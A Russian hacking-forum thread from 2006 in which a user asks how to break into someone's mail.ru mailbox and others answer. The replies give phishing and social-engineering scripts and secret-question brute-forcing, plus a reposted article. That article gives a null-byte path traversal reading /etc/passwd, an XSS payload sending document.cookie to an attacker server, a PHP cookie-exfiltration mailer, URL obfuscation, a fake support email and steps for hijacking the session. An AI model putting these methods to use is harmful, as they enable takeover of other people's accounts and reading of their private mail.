Здравствуйте, гость ( Вход | Регистрация )

Гостевой доступ к форуму из Москвы: Телефоны: +7(495)7859696,7376201,7376233,7868796,7390241 Login: demo Password: demo

ОтветитьСоздать новую тему
> Взлом на mail.ru
X-HEART
сообщение Dec 26 2006, 13:54
Сообщение #1

Black & White
Group Icon

Из: Москва, ЗАО
Заходит на форум с гостевика или полного инета.

Поделитесь советом. Ну очень нужно. Потом расскажу для чего biggrin.gif

--------------------
-О_О-
Пользователь offlineПрофайлОтправить личное сообщение
Вернуться к началу страницы
+Цитировать сообщение
Tier
сообщение Dec 26 2006, 14:02
Сообщение #2

Активный пользователь
Group Icon

Заходит на форум с полного инета.

есть одна разводка на лохов, но и на нее быват народ ведеться, но говорить пожалуй не станут так как у меня у самого один раз сперли пароль(не этим способом) правда восстановил потом, но все же.

--------------------
Изображение

+Цитировать сообщение
X-HEART
сообщение Dec 26 2006, 14:05
Сообщение #3

Black & White
Group Icon

Из: Москва, ЗАО

Ну не будьте жадными. я не в корыстных целях. Уверяю хозяин почты останется довольным biggrin.gif

--------------------
-О_О-
+Цитировать сообщение
Tier
сообщение Dec 26 2006, 14:16
Сообщение #4

Активный пользователь
Group Icon

регищ ящик с похожим на системное именем( здесь это reg-support@mail.ru) и высылаеш жертве тект.
(врядли сработает но все же, если получиться то он сам тебе свой пароль пришлет)

"На mail.ru несколько МИЛЛИОНОВ пользователей. Есть процент, который имеет слабую память и тупые мозги, чтоб запомнить свой пароль и частенько эти перцы сталкиваются с проблемой забывания пароля Итак, даже небольшой процент от более чем милионной толпы владельцев мыльниц - это тоже своеобразная толпа, которая требует свои пароли. Существуют всякие системы аля "Забыл пароль" в котором вас спрашивают ответ на секретный вопрос, данные, которые Вы вводили при регистрации и т.п. Но самое интересное, что этим занимается не человек, а машина, т.е. обычная программулина !!!! А если есть программа - есть в ней дыра. Теперь приступим к описанию конкретных действий.
Тут все просто. По адресу reg-support@mail.ru сидит mail-робот, который анализирует запросы на восстановление пароля и в зависимости от этого либо уточняет ваши данные, либо сразу шлет пароль. На сайте есть форма для заполнения с всевозможными параметрами, которая потом шлется роботу со специальным Subject'ом. Фишка в том, что если в сабжект впихнуть не один, а два запроса, то проверятся будет последний ящик, а информация будет выслана для второго! Так шевелим мозгами... Правильно! Высылаем два запроса: в одном сообщаем инфу о ящике жертве, во втором инфу о своем (о своем то мы все знаем wink.gif )

Итак, мы хотим обломать vasya_pupkin@mail.ru
Наш ящик hacker@mail.ru пароль qwerty
Пишем письмо роботу на reg-support@mail.ru
Subject: login=vasya_pupkin&pass=&answer=;login=hacker&pass=qwerty&answer=

Кому: reg-support@mail.ru
Копия:
Скрытый:
Тема: login=vasya_pupkin&pass=&answer=;login=hacker&pass=qwerty&answer=

Т.е. первый раз вставляем в тему письма запрос о ящике-жертве - vasya_pupkin@mail.ru : login=vasya_pupkin&pass=&answer=
А потом, через точку с запятой второй запрос, с вашими данными, которые робот проверит и убедится, что они правильные!
login=hacker&pass=qwerty&answer=
Итого : тема сообщения выглядит вот так :
login=vasya_pupkin&pass=&answer=;login=hacker&pass=qwerty&answer=
Все, ждите пасс на ваше мыло!!!"

Сообщение отредактировал Tier - Dec 26 2006, 14:18

--------------------
Изображение

+Цитировать сообщение
Siras
сообщение Dec 26 2006, 14:26
Сообщение #5

Server Admin
Group Icon

Из: Москва, Перово

угу... соц инжинерия и фишинг решают
+Цитировать сообщение
Kорбэн Даллас
сообщение Dec 27 2006, 13:58
Сообщение #6

Постоянный пользователь

Заходит на форум с гостевика.

Взлом мыла
Один из самых простых

Пишите владельцу мыла какое нить письмо, все равно с каким содержанием, но лишь бы хозяин мыла ответил. Если это какой нить "чудо-крутой хакер", то что нить типа: "Слушай, а ты в натуре можешь сайт сломать??? http://www.microsoft.com/ не твоя работа???" и так далее в этом духе...;-) Если Веб-мастер, то что нить типа: "Мне так нравится как ты пишешь! А у тебя JAVA-скрипта нету, что б он там что то делал???"...По фигу ЧТО, главное что б от него назад ответ пришел. В принципе эта вся процедура была только для того, что б узнать ИМЯ_ФАМИЛИЮ (или ник) и место расположения "клиента". То бишь если по ентому мылу находится аська, то смотрим инфу в аське, город (если не прописан в аське, то по ИП), имя, возраст и зип. Потом пишешь админу мыльного сервака (у любой мыльной системы есть админ, и у 99% www-шные сервера), обычно это адреса admin@provider.com и support@provider.com. Так вот... Пишешь письмо (очень желательно через www-браузер, например от www.mail.ru или www.hotmail.com) и через анонимную проксю. Это для того что б в заголовке пакета был ИП прокси. Так.... для секьюрити... ;-) Так вот. В теле письма пишешь, что так и так... Злобные хакеры украли у тебя мыло, а тебе очень нравится их служба, сервис, скорость работы, безглючность и все такое... Что ты никогда не променяешь ихний сервис, и что они вообще самые крутые мыльщики! Указываешь ИМЯ, ФАМИЛИЮ, ЗИП, ГОРОД, Телефон (от балды) или что они там еще просят.... Ессено назад придет письмо, что "Информация не совпадает с введенной при регистрации и все такое...". Но ты будь настойчивей! Пиши назад, что ТО_ЧТО_ТЫ_ИМ_ВЫДАЕШЬ - ЕДИНСТВЕННАЯ ВЕРНАЯ ИНФОРМАЦИЯ о ТВОЕМ аккаунте! И повторяешь им ту же инфу, что и первый раз. И так пока админ не сломится...но не забывай каждый раз расхваливать их сервис! ;-) Обычно раз на 7-10 прокатывает... ;-) У меня был даже раз случай, когда один буржуйский админ "отдал" мне мыло, где (как потом оказалось) инфа прописанная в мыле ВООБЩЕ не соответствовала той что я ему ВЫДАВАЛ якобы за владельца аккаунта! Так что дерзайте, тут главное БОЛЬШЕ фантазии и упорства! Но и о безопасности не забывайте!

Второй способ
Посложнее, но все равно общедоступный. Почти в каждом мыльном сервисе есть служба что типа "Foggot Password?" Так вот...Заходим туды (предварительно не забыв изменить атрибуты филе cookie_для_этой_службы на ReadOnly). Там обычно ОЧЕНЬ простые вопросы... Если повезет , то вопрос будет (к примеру на мыло.ру) "В каком городе ты родился"? В первом способе описано как узнавать город юзверя по мылу , так что на этом не бум останавливаться .Ну и вопросы бывают "кустомайзские"- типа "2000" , ответ обычно такойже..;-) А вот если что нить типа "Как зовут мою собаку?" , то читай ниже...
Открываем эту страницу (ну где вводить надо ответ на секретный вопрос , не догоняешь что ль???;-)) итам в HTML-просмотре ищем строчкутипа : form action="/cgi-bin/3970.dll?secquest" итд... Так вот... Если урл мыла http://www.mail.ru , то полный урл места куда отправляется"секретный ответ" будет http://www.mail.ru/cgi-bin/3970.dll?secquest. Этот урл вводишь вместе с индефикатором Вопроса в программу типа WWWHack. Идентификатор вопроса находится там же где и form action="/cgi-bin/3970.dll?secquest, только чуть дальше . Потом в эту программу или загружаешь встроенный wordlist c паролями или пишешь свой по конкретной тематике, это зависит от вопроса . И вперед! Запускаешь и ждешь...
Так что тут тоже нужно терпение и хоть базовые знания HTML.

--------------------

+Цитировать сообщение
aler
сообщение Dec 27 2006, 14:12
Сообщение #7

Постоянный пользователь
Group Icon

Настроение: ^^

Цитата(Voker @ Dec 27 2006, 14:58) *

Взлом мыла
Один из самых простых

......................

glare.gif
http://alf.org.ru/index.php?showtopic=111

--------------------
+Цитировать сообщение
Metallica
сообщение Dec 30 2006, 20:47
Сообщение #8

Oбиженный жизнью заморыш
Group Icon

Из: Матрица
Настроение: KILL EM ALL

MAIL.RU взломь

Баги популярного почтового сервера

На сегодняшний день Mail.ru - самая популярная российская почтовая система, и, наверняка, половина твоих знакомых держат именно там свои почтовые ящики. Этот сервис уже много лет юзают аж несколько миллионов наших соотечественников, и хотя бы по этой причине админы Мыл.Ру просто обязаны приложить все возможные усилия для предотвращения взлома мыльников хакерами. Из чистого любопытства мы решили проверить, как последние отрабатывают свой хлеб. И что же выяснилось? После пары хитрых манипуляций любой желающий может почитать почту своей подружки smile.gif.

Интродакшн

Penetration-test решено было устроить всем серверам, относящимся к почтовику mail.ru: tv.mail.ru, love.mail.ru, news.mail.ru и т.д. Зачем? Например, если я получу доступ к одной из тачек в ломаемой сети, можно будет установить на ней снифер и попробовать выловить пароль админа к почтовому серверу. Да мало ли что! wink.gif Имея доступ к доверенному серверу, становится возможным взломать даже самый неприступный сервант! Однако не стоит забывать, что главной моей целью был именно сервер авторизации Маил.Ру - win.mail.ru. Ломать такой популярный сервис при помощи чужих эксплойтов - дохлое дело, кроме того, это неинтересно. Мне захотелось самостоятельно найти какие-нибудь дырки в движке сайта. И что ты думаешь? Не прошло и десяти минут, как меня посетила удача: я нашел классическую ошибку с романтическим названием «Ядовитый ноль» в скрипте, работающем на сервере tv.mail.ru.

Танкистам посвящается

Дыра «Ядовитый ноль» известна хакерам еще со времен дедушки Ленина, и мы не раз писали про нее. Напомню о ней вкратце. Иногда web-дизайнеры при разработке сайтов делают следующую вещь. Они рисуют шаблон, содержащий колонтитулы страниц сайта, а основной текст, который должен быть отображен на страницах, распихивают по отдельным файлам (допустим, они имеют имена file1.db, file2.db и т.д.). После этого они вставляют в середину страницы перловый скрипт примерно такого содержания:

$file="$page.db";

open(FILE, ">$file");

$text=>FILE<;

close(FILE);

print "$text";

Если запустить скрипт с параметрами index.cgi?page=file1, он прочитает файл file1.db (если таковой имеется) и вставит его содержимое в середину веб-страницы. На первый взгляд, ничего необычного. Но интересное начнется, если передать скрипту что-нибудь типа page=index.cgi%00. Он откроет для чтения и выведет уже не index.cgi\0.db, а сам исходник index.cgi! Из-за чего это происходит, куда девается приписанное расширение .db? Как же %00 мог повлиять на работу скрипта? Символ \0 в Perl не является признаком конца строки, но библиотеки, которые юзает Перл, написаны на С. А вот как раз в этом чудесном языке \0 символизирует своим присутствием, что строка закончилась. Сам понимаешь, если сайт использует такой движок, становится возможным читать любые доступные файлы на сервере.

В брюхе телепузиков

При правильном значении переменной id скрипт tv.mail.ru/info.html (который, кстати, написан на Perl, хоть и имеет расширение .html) показывает подробное описание выбранной телепередачи. Как раз этот сценарий и содержит ошибку «Poisoned null byte». Баг заключается в следующем. Если присвоить переменной id хитрозадое значение, вместо описания телепрограммы ты увидишь содержимое произвольного файла. Например, URL http://tv.mail.ru/info.html?id=../../../....../etc/passwd%00 обличит контент файла /etc/passwd (см. скриншот). Содержимое конкретно этого файла хакеров, правда, не интересует, так как в нем нет почти ничего полезного. Интерес представляют админские бэкапы и прочие файлы, которые могут содержать какие-нибудь лакомые пароли или хотя бы их хэши. Поскольку права на сервере выставлены криво (все директории +x для web-юзера), листинг файлов, лежащих в папках, можно получить аналогичным способом. Например, строка http://tv.mail.ru/info.html?id=../../../......./../../etc%00, набранная в браузере, покажет содержимое каталога /etc.

Юзаем добычу

После четверти часа изучения сервера в папке /etc я нашел backup конфигов и прочей ерунды, среди которых были найдены пассы от MySQL и хэши паролей от FTP-аккаунтов. Поскольку зашифрованные строки были короткими и состояли из одних строчных латинских букв, John the Ripper достаточно быстро справился с задачей. Удивлению не было предела: неужели админы mail.ru используют такие простые пароли и выставили эти службы на всеобщее обозрение в инет? Конечно, нет smile.gif. Соединяться с FTP, SSH и MySQL-службами сервера tv.mail.ru можно только с определенного адреса: админ закрыл файрволом 21-й, 22-й и 3306-й порты, чтобы всякие хитропопые люди типа меня не совали туда свой любознательный нос smile.gif. Поэтому чтобы воспользоваться добытыми пассвордами, нужно было сначала поломать тачку админа (а он, как я понял, не лох) и только оттуда логиниться на сервер. Это голимое обстоятельство меня очень огорчило, и я решил, временно забив на найденную ошибку, покопать скрипты с другой стороны.

CSS-баг

Если ты читал статью про взлом ящиков на hotbox.ru и nm.ru в апрельском номере Х, то уже неплохо знаком с CSS-атаками. Для саперов придется вновь напомнить суть этой уязвимости. Большинство веб-сервисов хранит идентификатор пользовательской сессии в cookie - это удобно и относительно безопасно. Но если на сервере имеется дырка, при помощи которой хакер может вставить на страницу JavaScript-код, становится возможным прочитать секретный кукис и перехватить сессию, после чего заполучить полноценный доступ к серверу не составит труда. Если бы на mail.ru была такая уязвимость, можно было бы читать чужую почту. Я принялся искать, куда бы приткнуть свой вредоносный javascript. Однако на первых порах все попытки обламывались - скрипт жестко препятствовал вставке потенциально опасных тегов, фильтруя все получаемые от пользователя данные. Тем временем один мой знакомый (который хаком, кстати, не занимается) независимо от меня обнаружил на mail.ru одну прикольную фишку и показал ее мне. А заключается она вот в чем. Представь, что в твоем ящике лежат 4 непрочитанных письма. Если зайдешь в раздел «Написать письмо», впишешь в поле «To» какой-нибудь адрес, например, b00b1ik@real.xakep.ru, в поле «Тема» какую-нибудь тему, например, «Привет, дырявая дырка» и нажмешь на кнопку «Отправить», тогда в строке браузера увидишь текст такого содержания: http://www.mail.ru/sendmsgok?To=b00b1ik@re...&Subject=Привет, дырявая дырка&From=&user=i@mail.ru&TotalUnread=4&ReturnPath=win.mail.ru/cgi-bin. Видишь, переменной TotalUnread присваивается значение 4? А теперь попробуй вместо этой четверки набрать что-нибудь другое, например, «дохрена». В итоге количество непрочитанных писем заметно увеличится wink.gif) (см. скриншоты).

Я сразу просек тему, да и ты, думаю, уже догадался, что вместо «дохрена» без проблем можно вставить любую html-конструкцию - например, элементарную JS-программу. Теперь я мог сконструировать такую ссылку, перейдя по которой, моя жертва выполняла на своем компьютере вредоносный код, передающий идентификатор сессии моему php-скрипту.

Готовим инструмент

Для реализации атаки я написал два скрипта: первый крадет кукисы и передает их второму, который отсылает секретные данные мне на мыло.

Php-cкрипт для отправки кукиса на мыло хакера

$from = "bill@microsoft.com"; // от кого

$email = "hacker@hacker.ru"; // куда отправить

$topic = "Украденный у юзера mail.ru cookie"; // тема письма

$message = $QUERY_STRING; // тело письма

// (оно как раз и будет содержать похищенные данные из кукиса)

// собираем заголовки

$headers = "From: ".$from."\r\nReply-To: ".$from."\r\n";

$headers .= "MIME-Version: 1.0\r\n";

$headers .= "Content-Type: text/plain;";

$body .= $message."\r\n\r\n";

mail ($email, $topic, $body, $headers); // отправляем

А так выглядит сам встраиваемый яваскрипт:

>script<document.write('>img width=1 height=1 src="http://hacker_server/cookie_send.php?'+document.cookie+'"<');>/script<. Теперь формируем URL, содержащий вредоносный javascript. Выглядеть он будет так: http://www.mail.ru/sendmsgok?To=b00b1ik@re...&Subject=Привет, дырявая дырка&From=&user=i@mail.ru&TotalUnread=1 >script<document.write('>img width=1 height=1 src="http://hacker_server/cookie_send.php?'+document.cookie+'"<');>/script<&ReturnPath=win.mail.ru/cgi-bin. Ссылка эта, правда, выглядит достаточно подозрительно, поэтому многие пользователи просто побояться на нее нажимать. Чтобы решить эту проблему, я закодировал каждую букву параметров в шестнадцатеричное представление, что резко увеличило вероятность успеха. В этом мне помог незамысловатый скрипт, написанный на том же PHP:

>? $str = str_replace("%20", " ", $QUERY_STRING);

for($i=0;$i>strlen($str);$i++)

{$hex=dechex(ord($str[$i]));

if ($str[$i]=='&') echo "$str[$i]";

else if ($str[$i]!='\\') echo "%$hex";

} ?<

Теперь осталось только написать пользователю душещипательное письмо и поместить в него закодированную ссылку. Как только ламер прочитает послание и кликнет по линку, кукис с идентификатором его сессии будет у нас в руках.

Action, action!

Давай посмотрим, как это происходит на практике. Однажды мне потребовалось получить доступ к одному очень важному ящику, назовем его lopuh@mail.ru. Я залил скрипт cookie_send.php на свой сервер nsd.ru, в результате чего смертельный URL принял следующий вид: www.mail.ru/sendmsgok?To=b00b1ik@real.xakep.ru&Subject=Привет, дырявая дырка&From=&user=lopuh@mail.ru&TotalUnread=1>script<document.write('>img width=1 height=1 src="http://nsd.ru/test/cookie_send.php?'+document.cookie+'"<');>/script<&ReturnPath=win.mail.ru/cgi-bin.

После кодирования параметров ссылка приобрела более безобидную внешность: www.mail.ru/sendmsgok? %54%6f%3d%62%30%30%62%31%69%6b%40%72%65%61%6c%2e%78%61%6b%65%70%2e%72%75&%53%75%62%6a%65%63%74%3d%cf%f0%e8%e2%e5%f2%2c%20%e4%fb.... и т.д. Затем я написал пользователю письмо от лица администрации Mail.ru с текстом примерно такого содержания:

Form: Служба поддержки пользователей почтовой системы Mail.Ru >support@corp.mail.ru<

To: lopuh@mail.ru

Subj: Нарушение пользовательского соглашения

Уважаемый пользователь!

Вы нарушили 2-ю часть пункта 13 пользовательского соглашения. В ближайшее время ваш аккаунт будет заблокирован. Остановить блокировку аккаунта можно на этой странице: >сюда я вставил свою ядовитую ссылку<

Сразу же после того, как юзер кликнул по ссылке, мне пришло письмо такого содержания:

Стыренный кукис

p=QzQZAEt+VgAA; Mpop=1087929121:7a5977427771560319050219091d011b030c034f6a5d5e465e0207011b00720e
1f4758575a501c405044461658505d5b174345:pinch-pass@mail.ru:; t=obLD1AAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAABAAAAAAAAAA
AAAAQBwQcA; c0=xHefQgAAAAB11QEAAAAAAHXTAwAAAAAAfjECAAAAAACJ5AEAAAAA; c56=oiLbQAAAAABlFAEAAAAA; Mpopl=2122294019

Все! Я получил идентификатор сессии пользователя, а это и было моей целью.

Но что же делать дальше, как читать чужие письма? Здесь есть два пути. Первый - заюзать софтину CookieEditor, которую я уже подробно описывал в мартовском номере. Поэтому не буду повторяться и расскажу только о втором, более легком, на мой взгляд, пути, который заключается в использовании небезызвестной утилиты AccessDriver (http://nsd.ru/soft.php?group=hacksoft&razdel=other).

Сбор урожая

Слив и установив тулзу, я переключил ее в режим профи, для чего выбрал из меню «My Skill» пункт «EXPERT». Затем, выбрав во вкладке «Extra tools» пункт «HTTP Debuger», я приступил к активным действиям. В поле «HTTP Address» я засунул URL нужной мне страницы - например, чтобы посмотреть список писем в папке «Входящие», я набрал http://win.mail.ru/cgi-bin/msglist?folder=0. Далее я поставил галку «Use cookie» и набил в появившемся поле саму украденную куку. Осталось только нажать на батон «Connect», чтобы отправить запрос, и на «Result», чтобы просмотреть браузером полученный результат запроса.

Аналогичным образом можно просматривать и само тело письма, если указать в поле «HTTP Address» соответствующий адрес.

Заключение

Такие вот детские ошибки бывают на мегапорталах... Да что тут говорить, они есть везде, просто мы их не ищем, а сами они в глаза не бросаются. Если покопать со всех сторон какой-нибудь другой гиперпосещаемый ресурс, я уверен, баги и на нем найдутся.

Как закрыть дыры

1) Баг «Ядовитый ноль». Если бы скрипт проверял переменную id, удаляя из нее символ %00, баг не работал бы.

2) XSS-дыра. Существуют как минимум два способа предотвращения взлома мыльников. Если бы генерируемая сессия привязывалась к ip-адресу пользователя, воспользоваться украденной кукой хакер просто не смог бы. Ну а второй способ защиты от XSS очевиден - если фильтровать символы > и < во всех переменных, которые передаются скрипту sendmsgok, CSS-бага не было бы.

Как послать печенье вручную

Представь, что у тебя нет никакого софта для отправки кукисов. Не отчаивайся, ты можешь послать плюшку telnet'ом! Например, если ты хочешь передать cookie hotlog=1; spylog=1 скрипту http://nsd.ru/test/show_cookie.php, ты делаешь следующую вещь. Сначала подключаешься на 80 порт сервера nsd.ru, набрав в командной строке

telnet nsd.ru 80

далее отсылаешь такой запрос:

GET /test/show_cookie.php HTTP/1.1

Host: nsd.ru

Cookie: hotlog=1; spylog=1

и жмешь Enter два раза. Кстати, скрипт рабочий и ты можешь на нем потренироваться. Если все получится, ты увидишь свои куки, которые посылал скрипту.

CD

На нашем диске ты найдешь AccessDriver последней версии.

WARNING

Помни, что вся приведенная в статье информация носит лишь аналитический характер и повторение описанных действий может привести к уголовной ответственности. Берегись дядек в фуражках! wink.gif

INFO

Как видишь, детские ошибки встречаются даже в очень серьезных и авторитетных проектах. Думаю, программистам, разрабатывающим эти системы, стоит поразмыслить над собственным профессионализмом.

--------------------
Самые лучшие отзывы обо мне : [лопатой мозги вправить ], [Oбиженный жизнью заморыш],[ грубый и туповатый] , [не хватает интеллекта смотреть на мир шире. И все враги.], [озлобленный мальчик, помешанный на «членах» ] , [узколобость и шовинизм - это к имбецилам и другим болезням]
+Цитировать сообщение

ОтветитьСоздать новую тему